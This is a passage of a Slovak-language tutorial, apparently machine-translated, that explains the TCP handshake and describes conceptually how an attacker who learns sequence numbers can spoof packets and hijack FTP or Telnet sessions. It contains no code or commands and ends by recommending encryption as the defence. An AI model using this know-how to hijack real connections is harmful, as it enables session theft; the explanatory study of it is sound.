    Na identifikáciu paketu TCP sú v hlavičke TCP dva 32-bitové identifikátory, ktoré tiež fungujú ako počítadlá paketov, nazývané poradové číslo a číslo potvrdenia. Nás bude zaujímať ešte jedno pole TCP paketu, nazývané riadiace bity. Toto 6-bitové pole obsahuje nasledujúce riadiace bity (v poradí zľava doprava):

    URG - príznak naliehavosti;

    ACK - príznak potvrdenia;

    PSH - niesť vlajku;

    RST - príznak obnovenia spojenia;

    SYN - príznak synchronizácie;

    FIN - príznak ukončenia spojenia.

    Pozrime sa na postup vytvorenia TCP spojenia.

    1. Ak hostiteľ A potrebuje vytvoriť TCP spojenie s hostiteľom B, potom hostiteľ A odošle hostiteľovi B nasledujúcu správu:

    A -> B: SYN, ISSa

    To znamená, že správa odoslaná hostiteľom A má nastavený príznak SYN (Synchronize sequence number) a pole poradového čísla je nastavené na počiatočnú 32-bitovú hodnotu ISSa (Initial Sequence Number).

    2. Ako odpoveď na požiadavku prijatú od hostiteľa A hostiteľ B odpovie správou, v ktorej je nastavený bit SYN a nastavený bit ACK. V poli poradového čísla hostiteľ B nastaví svoju počiatočnú hodnotu počítadla - ISSb; pole s číslom potvrdenia potom bude obsahovať hodnotu ISSa prijatú v prvom pakete od hostiteľa A, zvýšenú o jednu. Takže hostiteľ B odpovie touto správou:

    B -> A: SYN, ACK, ISSb, ACK (ISSa+1)

    3. Nakoniec hostiteľ A pošle správu hostiteľovi B, v ktorej: je nastavený bit ACK; pole poradového čísla obsahuje hodnotu ISSa + 1; Pole s číslom potvrdenia obsahuje hodnotu ISSb + 1. Potom sa TCP spojenie medzi hostiteľmi A a B považuje za nadviazané:

    A -> B: ACK, ISSa+1, ACK(ISSb+1)

    4. Teraz môže hostiteľ A posielať dátové pakety hostiteľovi B cez novovytvorený virtuálny TCP kanál:

    A -> B: ACK, ISSa+1, ACK(ISSb+1); ÚDAJE

    DATA tu znamená údaje.

    Z vyššie uvedeného algoritmu na vytvorenie TCP spojenia je zrejmé, že jedinými identifikátormi TCP účastníkov a TCP spojenia sú dva 32-bitové parametre poradového čísla a čísla potvrdenia - ISSa a ISSb. Ak sa teda hackerovi podarí zistiť aktuálne hodnoty polí ISSa a ISSb, nič mu nezabráni vygenerovať sfalšovaný TCP paket. To znamená, že hackerovi stačí vybrať aktuálne hodnoty parametrov ISSa a ISSb TCP paketu pre dané TCP spojenie, odoslať paket z ľubovoľného internetového hostiteľa v mene klienta tohto TCP spojenia a tento paket budú vnímané ako správne!

    Nebezpečenstvo takéhoto spoofingu TCP paketov je tiež dôležité, pretože vysokoúrovňové protokoly FTP a TELNET sú implementované na základe protokolu TCP a identifikácia paketových klientov FTP a TELNET je úplne založená na protokole TCP.

    Okrem toho, keďže protokoly FTP a TELNET nekontrolujú IP adresy odosielateľov správ, po prijatí sfalšovaného paketu servery FTP alebo TELNET pošlú správu s odpoveďou na IP adresu hackerského hostiteľa špecifikovaného vo falošnom pakete. Potom začne hackerský hostiteľ pracovať so serverom FTP alebo TELNET zo svojej IP adresy, ale s právami legálne pripojeného používateľa, ktorý naopak stratí kontakt so serverom v dôsledku nesúladu počítadiel.

    Na uskutočnenie vyššie opísaného útoku je teda nevyhnutnou a postačujúcou podmienkou znalosť dvoch súčasných 32-bitových parametrov ISSa a ISSb, ktoré identifikujú TCP spojenie. Uvažujme možné spôsoby ich prijímanie. V prípade, že je hackerský hostiteľ pripojený k napadnutému segmentu siete, je úloha získať hodnoty ISSa a ISSb triviálna a dá sa vyriešiť analýzou sieťovej prevádzky. Preto je potrebné jasne pochopiť, že protokol TCP v zásade umožňuje chrániť spojenie iba vtedy, ak útočník nemôže zachytiť správy prenášané cez toto spojenie, teda iba v prípade, keď je hackerský hostiteľ pripojený k segmentu siete, ktorý sa líši od segmentu účastníka TCP spojenia.

    Preto sú medzisegmentové útoky pre hackera najviac zaujímavé, keď sa útočník a jeho cieľ nachádzajú v rôznych segmentoch siete. V tomto prípade nie je úloha získať hodnoty ISSa a ISSb triviálna. Na vyriešenie tohto problému boli teraz vynájdené iba dve metódy.

    Matematická predikcia počiatočnej hodnoty parametrov TCP spojenia extrapoláciou predchádzajúcich hodnôt ISSa a ISSb.

    Využitie zraniteľností pri identifikácii predplatiteľov pripojenia TCP na serveroch Unix rsh.

    Prvá úloha je riešená prostredníctvom hĺbkových štúdií implementácie protokolu TCP v rôznych operačné systémy a teraz má čisto teoretický význam. Druhý problém je vyriešený pomocou zraniteľností Unixové systémy identifikáciou dôveryhodných hostiteľov. (Dôveryhodný vzhľadom na daného hostiteľa A je sieťový hostiteľ B, ktorého používateľ sa môže pripojiť k hostiteľovi A bez autentifikácie pomocou služby r hostiteľa A). Manipuláciou s parametrami TCP paketov sa hacker môže pokúsiť vydávať za dôveryhodného hostiteľa a zachytiť TCP spojenie s napadnutým hostiteľom.

    To všetko je veľmi zaujímavé, ale praktické výsledky tohto druhu výskumu zatiaľ nie sú viditeľné. Preto odporúčame všetkým, ktorí sa chcú tejto téme hlbšie venovať, aby sa obrátili na knihu, odkiaľ boli predovšetkým prevzaté vyššie uvedené informácie.

    Záver

    Zachytávanie sieťových údajov je najefektívnejšia metóda sieťového hackingu, ktorá umožňuje hackerovi získať takmer všetky informácie kolujúce v sieti. Najväčší praktický rozvoj dosiahli nástroje šnupania, t.j. počúvanie sietí; Nemôžeme však ignorovať metódy zachytávania sieťových údajov, vykonávané zásahom do normálneho fungovania siete za účelom presmerovania prevádzky na hackerského hostiteľa, najmä metódy zachytávania TCP spojení. V praxi však posledné menované metódy ešte neprešli dostatočným vývojom a je potrebné ich zdokonaľovať.

    Anti-hacker by mal vedieť, že jedinou záchranou pred zachytávaním dát je ich šifrovanie, t.j. metódy kryptografickej ochrany. Pri odosielaní správy cez sieť by ste mali vopred predpokladať, že káblový systém siete je absolútne zraniteľný a každý hacker pripojený k sieti z neho bude môcť zachytiť všetky prenášané tajné správy. Na vyriešenie tohto problému existujú dve technológie – vytvorenie siete VPN a šifrovanie samotných správ. Všetky tieto úlohy sa dajú veľmi jednoducho vyriešiť pomocou softvérového balíka PGP Desktop Security (jeho popis nájdete napr. v ).



    
    Hore